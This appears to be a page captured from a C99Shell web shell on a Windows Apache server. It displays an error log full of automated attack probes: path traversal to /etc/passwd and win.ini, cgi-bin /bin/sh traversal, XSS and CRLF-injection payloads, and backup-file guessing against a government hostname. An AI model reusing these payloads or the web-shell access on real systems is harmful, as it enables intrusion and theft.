!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2022.06.02.log (151.47 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Thu Jun 02 00:26:14.247529 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 01:21:15.916328 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 01:34:38.211138 2022] [proxy:error] [pid 8808:tid 21168] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Thu Jun 02 01:34:38.211138 2022] [proxy:error] [pid 8808:tid 21168] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Thu Jun 02 01:34:38.211138 2022] [proxy_http:error] [pid 8808:tid 21168] [client 152.61.128.50:52682] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Thu Jun 02 01:34:38.445138 2022] [proxy:error] [pid 8808:tid 21168] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 02 01:34:38.679138 2022] [proxy:error] [pid 8808:tid 21168] AH00940: HTTP: disabled connection for (172.22.1.51)
[Thu Jun 02 02:03:52.200218 2022] [core:error] [pid 8808:tid 21080] [client 193.106.191.48:59668] AH00126: Invalid URI in request POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
[Thu Jun 02 02:11:09.968187 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 02:33:31.821144 2022] [proxy:error] [pid 8808:tid 21192] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.173.36:80 (192.168.173.36) failed
[Thu Jun 02 02:33:31.821144 2022] [proxy:error] [pid 8808:tid 21192] AH00959: ap_proxy_connect_backend disabling worker for (192.168.173.36) for 60s
[Thu Jun 02 02:33:31.821144 2022] [proxy_http:error] [pid 8808:tid 21192] [client 20.96.170.139:1536] AH01114: HTTP: failed to make connection to backend: 192.168.173.36
[Thu Jun 02 02:33:31.821144 2022] [negotiation:error] [pid 8808:tid 21192] [client 20.96.170.139:1536] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_SERVICE_UNAVAILABLE.html.var
[Thu Jun 02 02:33:32.195545 2022] [proxy:error] [pid 8808:tid 21128] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 192.168.173.36:80 (192.168.173.36) failed
[Thu Jun 02 02:33:32.195545 2022] [proxy_http:error] [pid 8808:tid 21128] [client 20.96.170.139:1537] AH01114: HTTP: failed to make connection to backend: 192.168.173.36
[Thu Jun 02 02:33:32.195545 2022] [negotiation:error] [pid 8808:tid 21128] [client 20.96.170.139:1537] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_SERVICE_UNAVAILABLE.html.var
[Thu Jun 02 02:46:49.824946 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:09:21.036919 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:15:14.643740 2022] [cgi:error] [pid 8808:tid 21304] [client 117.252.212.78:37953] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Thu Jun 02 03:30:55.294192 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:34:11.043336 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:34:48.093401 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:40:34.117609 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:47:15.943115 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 03:58:07.665459 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 04:18:10.100971 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 04:19:14.341884 2022] [mpm_winnt:warn] [pid 8808:tid 21552] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Thu Jun 02 05:36:01.233776 2022] [core:error] [pid 8808:tid 21040] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36722] AH00127: Cannot map GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 to file
[Thu Jun 02 05:36:01.296176 2022] [core:error] [pid 8808:tid 21232] [client 46.101.1.185:36744] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:36:01.327376 2022] [core:error] [pid 8808:tid 21240] [client 46.101.1.185:36750] AH00126: Invalid URI in request GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1
[Thu Jun 02 05:36:01.342976 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:36742] AH00126: Invalid URI in request GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:01.670577 2022] [core:error] [pid 8808:tid 21168] [client 46.101.1.185:36798] AH00126: Invalid URI in request POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
[Thu Jun 02 05:36:01.857777 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:36804] script not found or unable to stat: E:/nuevo/cgi-bin/operator
[Thu Jun 02 05:36:01.857777 2022] [core:error] [pid 8808:tid 21128] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36812] AH00127: Cannot map GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1 to file
[Thu Jun 02 05:36:01.920177 2022] [cgi:error] [pid 8808:tid 21256] [client 46.101.1.185:36836] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:36:02.185378 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:36864] AH00126: Invalid URI in request GET /../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:02.200978 2022] [negotiation:error] [pid 8808:tid 21224] [client 46.101.1.185:36878] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: ambientic.ambientebogota.gov.co:80/user/register
[Thu Jun 02 05:36:02.247778 2022] [core:error] [pid 8808:tid 21032] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36892] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.7z HTTP/1.1 to file
[Thu Jun 02 05:36:02.497378 2022] [cgi:error] [pid 8808:tid 21128] [client 46.101.1.185:36918] script not found or unable to stat: E:/nuevo/htdocs/free_time.cgi
[Thu Jun 02 05:36:02.497378 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:36922] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:02.512978 2022] [core:error] [pid 8808:tid 21040] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36926] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:02.544178 2022] [core:error] [pid 8808:tid 21016] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36938] AH00127: Cannot map GET /lucees3ezf%3cimg%20src%3da%20onerror%3dalert('2A18y7F7JTnMSooR1adcpKo8JRY')%3elujb7/admin/imgProcess.cfm HTTP/1.1 to file
[Thu Jun 02 05:36:02.559778 2022] [core:error] [pid 8808:tid 21256] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36944] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.bz2 HTTP/1.1 to file
[Thu Jun 02 05:36:02.684578 2022] [core:error] [pid 8808:tid 21208] [client 46.101.1.185:36964] AH00126: Invalid URI in request GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
[Thu Jun 02 05:36:02.887379 2022] [core:error] [pid 8808:tid 21032] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:36998] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.gz HTTP/1.1 to file
[Thu Jun 02 05:36:03.121379 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:37026] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:36:03.199379 2022] [core:error] [pid 8808:tid 21192] [client 46.101.1.185:37048] AH00126: Invalid URI in request GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
[Thu Jun 02 05:36:03.214979 2022] [core:error] [pid 8808:tid 21284] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37054] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.lz HTTP/1.1 to file
[Thu Jun 02 05:36:03.246179 2022] [cgi:error] [pid 8808:tid 21120] [client 46.101.1.185:37062] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:03.308579 2022] [cgi:error] [pid 8808:tid 21304] [client 46.101.1.185:37070] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://ambientic.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:03.308579 2022] [cgi:error] [pid 8808:tid 21128] [client 46.101.1.185:37068] script not found or unable to stat: E:/nuevo/htdocs/command.cgi
[Thu Jun 02 05:36:03.526980 2022] [core:error] [pid 8808:tid 21304] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37108] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.rar HTTP/1.1 to file
[Thu Jun 02 05:36:03.620580 2022] [cgi:error] [pid 8808:tid 21192] [client 46.101.1.185:37122] script not found or unable to stat: E:/nuevo/htdocs/tools.cgi, referer: http://ambientic.ambientebogota.gov.co:80/tools.cgi
[Thu Jun 02 05:36:03.838980 2022] [core:error] [pid 8808:tid 21284] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37160] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.tar.gz HTTP/1.1 to file
[Thu Jun 02 05:36:03.948181 2022] [cgi:error] [pid 8808:tid 21128] [client 46.101.1.185:37176] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:04.072981 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:37184] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:36:04.166581 2022] [core:error] [pid 8808:tid 21224] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37212] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.xz HTTP/1.1 to file
[Thu Jun 02 05:36:04.260181 2022] [cgi:error] [pid 8808:tid 21256] [client 46.101.1.185:37226] script not found or unable to stat: E:/nuevo/htdocs/backup2.cgi
[Thu Jun 02 05:36:04.416181 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:37236] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:36:04.462982 2022] [cgi:error] [pid 8808:tid 21192] [client 46.101.1.185:37252] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:36:04.478582 2022] [core:error] [pid 8808:tid 21232] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37258] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.zip HTTP/1.1 to file
[Thu Jun 02 05:36:04.774982 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:37302] script not found or unable to stat: E:/nuevo/htdocs/log_download.cgi
[Thu Jun 02 05:36:04.790582 2022] [core:error] [pid 8808:tid 21032] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37308] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.z HTTP/1.1 to file
[Thu Jun 02 05:36:05.055783 2022] [core:error] [pid 8808:tid 21192] (22)Invalid argument: [client 46.101.1.185:37346] AH00127: Cannot map GET /%c0 HTTP/1.1 to file
[Thu Jun 02 05:36:05.102583 2022] [core:error] [pid 8808:tid 21080] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37358] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.tar.z HTTP/1.1 to file
[Thu Jun 02 05:36:05.430183 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37408] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.db HTTP/1.1 to file
[Thu Jun 02 05:36:05.430183 2022] [core:error] [pid 8808:tid 21064] [client 46.101.1.185:37412] AH00126: Invalid URI in request t3 12.2.1
[Thu Jun 02 05:36:05.476983 2022] [negotiation:error] [pid 8808:tid 21168] [client 46.101.1.185:37422] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:05.742184 2022] [core:error] [pid 8808:tid 21256] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37458] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sqlite HTTP/1.1 to file
[Thu Jun 02 05:36:05.804584 2022] [negotiation:error] [pid 8808:tid 21120] [client 46.101.1.185:37470] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:06.038584 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:37502] script not found or unable to stat: E:/nuevo/cgi-bin/kerbynet
[Thu Jun 02 05:36:06.054184 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37506] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sqlitedb HTTP/1.1 to file
[Thu Jun 02 05:36:06.116584 2022] [negotiation:error] [pid 8808:tid 21304] [client 46.101.1.185:37520] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:06.163385 2022] [cgi:error] [pid 8808:tid 21016] [client 46.101.1.185:37524] script not found or unable to stat: E:/nuevo/cgi-bin/rpc
[Thu Jun 02 05:36:06.366185 2022] [core:error] [pid 8808:tid 21256] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37554] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.7z HTTP/1.1 to file
[Thu Jun 02 05:36:06.428585 2022] [negotiation:error] [pid 8808:tid 21168] [client 46.101.1.185:37568] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:06.693785 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37600] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.bz2 HTTP/1.1 to file
[Thu Jun 02 05:36:06.740586 2022] [negotiation:error] [pid 8808:tid 20996] [client 46.101.1.185:37612] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:06.787386 2022] [core:error] [pid 8808:tid 21080] [client 46.101.1.185:37618] AH00126: Invalid URI in request GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:07.005786 2022] [core:error] [pid 8808:tid 21256] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37648] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.gz HTTP/1.1 to file
[Thu Jun 02 05:36:07.052586 2022] [negotiation:error] [pid 8808:tid 21120] [client 46.101.1.185:37662] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:07.317787 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37696] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.lz HTTP/1.1 to file
[Thu Jun 02 05:36:07.426987 2022] [cgi:error] [pid 8808:tid 21240] [client 46.101.1.185:37714] script not found or unable to stat: E:/nuevo/cgi-bin/weblogin.cgi
[Thu Jun 02 05:36:07.598587 2022] [core:error] [pid 8808:tid 21240] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37732] AH00127: Cannot map GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1 to file
[Thu Jun 02 05:36:07.629787 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37742] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.rar HTTP/1.1 to file
[Thu Jun 02 05:36:07.692187 2022] [core:error] [pid 8808:tid 21064] [client 46.101.1.185:37754] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:07.879388 2022] [core:error] [pid 8808:tid 21168] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37768] AH00127: Cannot map GET /hsqldb%0a HTTP/1.1 to file
[Thu Jun 02 05:36:07.957388 2022] [core:error] [pid 8808:tid 21016] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37790] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.tar.gz HTTP/1.1 to file
[Thu Jun 02 05:36:08.004188 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:37802] AH00135: Invalid method in request envi
[Thu Jun 02 05:36:08.269388 2022] [core:error] [pid 8808:tid 21080] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37838] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.xz HTTP/1.1 to file
[Thu Jun 02 05:36:08.581389 2022] [core:error] [pid 8808:tid 21272] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37886] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.zip HTTP/1.1 to file
[Thu Jun 02 05:36:08.643789 2022] [cgi:error] [pid 8808:tid 21064] [client 46.101.1.185:37900] script not found or unable to stat: E:/nuevo/cgi-bin/libagent.cgi
[Thu Jun 02 05:36:08.877789 2022] [core:error] [pid 8808:tid 21180] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37926] AH00127: Cannot map GET /%0A/example.com/ HTTP/1.1 to file
[Thu Jun 02 05:36:08.893389 2022] [core:error] [pid 8808:tid 21016] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37934] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.z HTTP/1.1 to file
[Thu Jun 02 05:36:09.049390 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:37956] script not found or unable to stat: E:/nuevo/htdocs/netcore_get.cgi
[Thu Jun 02 05:36:09.205390 2022] [core:error] [pid 8808:tid 21088] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:37984] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql.tar.z HTTP/1.1 to file
[Thu Jun 02 05:36:09.548590 2022] [core:error] [pid 8808:tid 21256] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38036] AH00127: Cannot map GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1 to file
[Thu Jun 02 05:36:09.969791 2022] [cgi:error] [pid 8808:tid 21232] [client 46.101.1.185:38094] script not found or unable to stat: E:/nuevo/cgi-bin/webproc
[Thu Jun 02 05:36:10.422192 2022] [core:error] [pid 8808:tid 21144] [client 46.101.1.185:38148] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:10.531392 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:38170] script not found or unable to stat: E:/nuevo/htdocs/if.cgi
[Thu Jun 02 05:36:10.578192 2022] [core:error] [pid 8808:tid 21120] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38174] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.key HTTP/1.1 to file
[Thu Jun 02 05:36:10.734193 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:38186] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:10.843393 2022] [cgi:error] [pid 8808:tid 21080] [client 46.101.1.185:38212] script not found or unable to stat: E:/nuevo/htdocs/password.cgi
[Thu Jun 02 05:36:10.890193 2022] [core:error] [pid 8808:tid 21232] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38216] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.pem HTTP/1.1 to file
[Thu Jun 02 05:36:11.046193 2022] [core:error] [pid 8808:tid 21232] [client 46.101.1.185:38228] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:11.170993 2022] [negotiation:error] [pid 8808:tid 21180] [client 46.101.1.185:38252] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_METHOD_NOT_ALLOWED.html.var
[Thu Jun 02 05:36:11.358194 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:38270] script not found or unable to stat: E:/nuevo/htdocs/overview.asp
[Thu Jun 02 05:36:11.358194 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:38272] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:11.685794 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:38314] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:11.997795 2022] [core:error] [pid 8808:tid 21256] [client 46.101.1.185:38356] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:12.169395 2022] [cgi:error] [pid 8808:tid 21088] [client 46.101.1.185:38390] script not found or unable to stat: E:/nuevo/cgi-bin/mj_wwwusr
[Thu Jun 02 05:36:12.309795 2022] [core:error] [pid 8808:tid 21080] [client 46.101.1.185:38398] AH00126: Invalid URI in request USER admin
[Thu Jun 02 05:36:12.512596 2022] [cgi:error] [pid 8808:tid 21256] [client 46.101.1.185:38436] script not found or unable to stat: E:/nuevo/cgi-bin/mainfunction.cgi
[Thu Jun 02 05:36:12.621796 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:38440] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:12.668596 2022] [core:error] [pid 8808:tid 21284] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38450] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1 to file
[Thu Jun 02 05:36:12.715396 2022] [core:error] [pid 8808:tid 21120] [client 46.101.1.185:38456] AH00126: Invalid URI in request GET /loginLess/../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:12.746596 2022] [cgi:error] [pid 8808:tid 21304] [client 46.101.1.185:38466] script not found or unable to stat: E:/nuevo/cgi-bin/koha
[Thu Jun 02 05:36:12.949396 2022] [core:error] [pid 8808:tid 21304] [client 46.101.1.185:38486] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:12.980596 2022] [core:error] [pid 8808:tid 21180] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38490] AH00127: Cannot map GET /.../.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1 to file
[Thu Jun 02 05:36:13.261397 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:38530] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:13.308197 2022] [core:error] [pid 8808:tid 21284] [client 46.101.1.185:38534] AH00126: Invalid URI in request GET /../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:13.370597 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:38548] AH00126: Invalid URI in request GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:13.588998 2022] [core:error] [pid 8808:tid 21088] [client 46.101.1.185:38570] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:13.900998 2022] [core:error] [pid 8808:tid 21064] [client 46.101.1.185:38612] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:13.994598 2022] [core:error] [pid 8808:tid 21192] [client 46.101.1.185:38628] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:14.056998 2022] [core:error] [pid 8808:tid 21040] [client 46.101.1.185:38640] AH00126: Invalid URI in request GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:14.088198 2022] [core:error] [pid 8808:tid 21088] [client 46.101.1.185:38648] AH00126: Invalid URI in request GET /../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:14.212999 2022] [core:error] [pid 8808:tid 21240] [client 46.101.1.185:38652] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:14.259799 2022] [core:error] [pid 8808:tid 21032] [client 46.101.1.185:38664] AH00126: Invalid URI in request GET /../../../../../../../../windows/win.ini HTTP/1.1
[Thu Jun 02 05:36:14.290999 2022] [cgi:error] [pid 8808:tid 21272] [client 46.101.1.185:38670] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:14.306599 2022] [core:error] [pid 8808:tid 21180] [client 46.101.1.185:38672] AH00126: Invalid URI in request USER anonymous
[Thu Jun 02 05:36:14.322199 2022] [cgi:error] [pid 8808:tid 21284] [client 46.101.1.185:38676] script not found or unable to stat: E:/nuevo/cgi-bin/login
[Thu Jun 02 05:36:14.337799 2022] [core:error] [pid 8808:tid 21192] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38680] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80.sql HTTP/1.1 to file
[Thu Jun 02 05:36:14.524999 2022] [core:error] [pid 8808:tid 21192] [client 46.101.1.185:38696] AH00126: Invalid URI in request USER root
[Thu Jun 02 05:36:14.571799 2022] [core:error] [pid 8808:tid 21224] [client 46.101.1.185:38706] AH00126: Invalid URI in request GET /../conf/config.properties HTTP/1.1
[Thu Jun 02 05:36:14.618599 2022] [cgi:error] [pid 8808:tid 21120] [client 46.101.1.185:38714] script not found or unable to stat: E:/nuevo/cgi-bin/system_log.cgi
[Thu Jun 02 05:36:14.649799 2022] [core:error] [pid 8808:tid 21284] (20024)The given path is misformatted or contained invalid characters: [client 46.101.1.185:38724] AH00127: Cannot map GET /ambientic.ambientebogota.gov.co:80_db.sql HTTP/1.1 to file
[Thu Jun 02 05:36:14.883800 2022] [cgi:error] [pid 8808:tid 21064] [client 46.101.1.185:38750] script not found or unable to stat: E:/nuevo/htdocs/wgarcmin.cgi
[Thu Jun 02 05:36:16.147402 2022] [negotiation:error] [pid 8808:tid 21176] [client 46.101.1.185:38924] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var, referer: http://ambientic.ambientebogota.gov.co:80
[Thu Jun 02 05:36:16.303402 2022] [core:error] [pid 8808:tid 21168] [client 46.101.1.185:38952] AH00126: Invalid URI in request GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
[Thu Jun 02 05:36:16.475003 2022] [cgi:error] [pid 8808:tid 21040] [client 46.101.1.185:38972] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Thu Jun 02 05:36:16.553003 2022] [cgi:error] [pid 8808:tid 21256] [client 46.101.1.185:38988] script not found or unable to stat: E:/nuevo/cgi-bin/file_transfer.cgi
[Thu Jun 02 05:36:16.787003 2022] [negotiation:error] [pid 8808:tid 21272] [client 46.101.1.185:39012] AH00690: no acceptable variant: E:/nuevo/apache/error/HTTP_NOT_FOUND.html.var
[Thu Jun 02 05:36:18.050605 2022] [cgi:error] [pid 8808:tid 21224] [client 46.101.1.185:39168] script not found or unable to stat: E:/nuevo/cgi-bin/login.cgi
[Thu Jun 02 05:36:18.050605 2022] [cgi:error] [pid 8808:tid 21144] [client 46.101.1.185:39172] script not found or unable to stat: E:/nuevo/htdocs/apply_sec.cgi
[Thu Jun 02 05:36:18.081805 2022] [cgi:error] [pid 8808:tid 21120] [client 46.101.1.185:39174] script not found or unable to stat: E:/nuevo/cgi-bin/cgiServer.exx
